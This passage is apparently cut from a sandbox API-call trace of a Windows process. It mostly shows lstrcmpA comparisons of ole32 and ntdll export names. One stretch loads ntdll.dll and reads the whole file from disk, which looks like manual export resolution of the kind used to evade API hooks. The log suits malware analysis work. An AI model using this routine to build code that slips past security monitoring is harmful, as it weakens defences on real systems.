(lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0109.442] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0109.442] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0109.442] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Connect") returned -1 [0109.442] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0109.442] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0109.442] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0109.442] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CheckInitDde") returned 1 [0109.442] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CleanROTForApartment") returned 1 [0109.442] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="ClipboardProcessUninitialize") returned 1 [0109.442] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAddRefServerProcess") returned 1 [0109.442] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAicGetTokenForCOM") returned 0 [0109.442] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="BindMoniker") returned 1 [0109.442] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree") returned 1 [0109.442] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree64") returned 1 [0109.442] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0109.442] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0109.442] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0109.442] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0109.442] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize") returned 1 [0109.442] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize64") returned 1 [0109.443] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0109.443] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0109.443] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0109.443] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0109.443] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromOle1Class") returned 1 [0109.443] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgID") returned 1 [0109.443] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgIDEx") returned 1 [0109.443] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromString") returned 1 [0109.443] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0109.443] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0109.443] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0109.443] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0109.443] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0109.443] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0109.443] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0109.443] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0109.443] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0109.443] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Connect") returned -1 [0109.443] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0109.443] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0109.443] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0109.443] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CheckInitDde") returned 1 [0109.443] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CleanROTForApartment") returned 1 [0109.443] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="ClipboardProcessUninitialize") returned 1 [0109.443] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAddRefServerProcess") returned 1 [0109.443] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAicGetTokenForCOM") returned 1 [0109.443] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAllowSetForegroundWindow") returned 0 [0109.443] lstrcmpA (lpString1="CoBuildVersion", lpString2="BindMoniker") returned 1 [0109.443] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree") returned 1 [0109.443] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree64") returned 1 [0109.443] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0109.443] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0109.444] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0109.444] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0109.444] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize") returned 1 [0109.444] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize64") returned 1 [0109.444] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0109.444] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0109.444] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0109.444] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0109.444] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromOle1Class") returned 1 [0109.444] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgID") returned 1 [0109.444] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgIDEx") returned 1 [0109.444] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromString") returned 1 [0109.444] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0109.444] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0109.444] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0109.444] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0109.444] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0109.444] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0109.444] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0109.444] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0109.444] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0109.444] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Connect") returned -1 [0109.444] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0109.444] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0109.444] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0109.444] lstrcmpA (lpString1="CoBuildVersion", lpString2="CheckInitDde") returned 1 [0109.462] GetProcessHeap () returned 0x480000 [0109.462] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4074040 | out: hHeap=0x480000) returned 1 [0109.469] GetProcessHeap () returned 0x480000 [0109.469] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x10) returned 0x499380 [0109.469] LoadLibraryA (lpLibFileName="Ntdll.dll") returned 0x7ffc5f810000 [0109.469] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0109.469] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0109.469] GetModuleFileNameA (in: hModule=0x7ffc5f810000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0109.469] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0109.470] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0109.470] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0109.470] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1817160) returned 1 [0109.470] GetProcessHeap () returned 0x480000 [0109.470] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1bba48) returned 0x4073040 [0109.666] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0109.666] ReadFile (in: hFile=0x140, lpBuffer=0x4073040, nNumberOfBytesToRead=0x1bba48, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4073040*, lpNumberOfBytesRead=0x14f5a4*=0x1bba48, lpOverlapped=0x0) returned 1 [0109.687] CloseHandle (hObject=0x140) returned 1 [0109.687] lstrcmpA (lpString1="A_SHAFinal", lpString2="A_SHAFinal") returned 0 [0109.687] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAFinal") returned 1 [0109.687] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAInit") returned 0 [0109.687] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAFinal") returned 1 [0109.687] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAInit") returned 1 [0109.687] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAUpdate") returned 0 [0109.687] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAFinal") returned 1 [0109.687] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAInit") returned 1 [0109.687] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAUpdate") returned 1 [0109.687] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 0 [0109.688] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAFinal") returned 1 [0109.688] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAInit") returned 1 [0109.688] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAUpdate") returned 1 [0109.688] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0109.688] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcFreeCompletionListMessage") returned 0 [0109.688] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAFinal") returned 1 [0109.688] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAInit") returned 1 [0109.688] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAUpdate") returned 1 [0109.688] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0109.688] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcFreeCompletionListMessage") returned 1 [0109.688] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcGetCompletionListLastMessageInformation") returned 0 [0109.688] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAFinal") returned 1 [0109.688] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAInit") returned 1 [0109.688] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAUpdate") returned 1 [0109.688] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0109.688] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcFreeCompletionListMessage") returned 1 [0109.688] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0109.688] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListMessageAttributes") returned 0 [0109.688] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAFinal") returned 1 [0109.688] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAInit") returned 1 [0109.688] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAUpdate") returned 1 [0109.688] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0109.688] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcFreeCompletionListMessage") returned 1 [0109.688] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0109.688] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0109.689] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetHeaderSize") returned 0 [0109.689] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAFinal") returned 1 [0109.689] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAInit") returned 1 [0109.689] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0109.689] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0109.689] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0109.689] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0109.689] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0109.689] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0109.689] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 0 [0109.689] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAFinal") returned 1 [0109.689] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAInit") returned 1 [0109.689] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAUpdate") returned 1 [0109.689] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0109.689] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0109.689] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0109.689] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0109.689] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0109.689] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0109.689] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 0 [0109.689] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAFinal") returned 1 [0109.689] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAInit") returned 1 [0109.689] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAUpdate") returned 1 [0109.689] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0109.689] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcFreeCompletionListMessage") returned 1 [0109.689] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0109.689] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0109.689] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetHeaderSize") returned 1 [0109.690] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageAttribute") returned 1 [0109.690] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0109.690] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 0 [0109.690] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAFinal") returned 1 [0109.690] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAInit") returned 1 [0109.690] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0109.690] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0109.690] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0109.690] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0109.690] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0109.690] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0109.690] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 1 [0109.690] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0109.690] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0109.690] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcInitializeMessageAttribute") returned 0 [0109.690] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAFinal") returned 1 [0109.690] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAInit") returned 1 [0109.690] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAUpdate") returned 1 [0109.690] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0109.690] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcFreeCompletionListMessage") returned 1 [0109.690] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0109.690] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0109.690] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetHeaderSize") returned 1 [0109.691] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageAttribute") returned 1 [0109.691] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0109.691] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0109.691] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcInitializeMessageAttribute") returned 1 [0109.691] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcMaxAllowedMessageLength") returned 0 [0109.691] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAFinal") returned 1 [0109.691] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAInit") returned 1 [0109.691] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0109.691] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0109.691] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0109.691] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0109.691] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0109.691] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0109.691] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0109.691] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0109.691] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0109.691] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0109.691] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0109.691] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 0 [0109.691] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0109.691] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0109.691] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0109.691] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0109.691] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0109.691] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0109.691] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0109.691] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0109.692] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0109.692] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0109.692] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0109.692] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0109.692] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0109.692] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0109.692] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 0 [0109.692] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAFinal") returned 1 [0109.692] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAInit") returned 1 [0109.692] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAUpdate") returned 1 [0109.692] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0109.692] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0109.692] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0109.692] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0109.692] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0109.692] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0109.692] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0109.692] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0109.692] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0109.692] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0109.692] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0109.692] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0109.693] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRundownCompletionList") returned 0 [0109.693] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAFinal") returned 1 [0109.693] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAInit") returned 1 [0109.693] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0109.693] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0109.693] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0109.693] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0109.693] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0109.693] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0109.693] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0109.693] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0109.693] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0109.693] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0109.693] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0109.693] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0109.693] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0109.693] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRundownCompletionList") returned 1 [0109.693] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcUnregisterCompletionList") returned 0 [0109.693] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0109.693] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 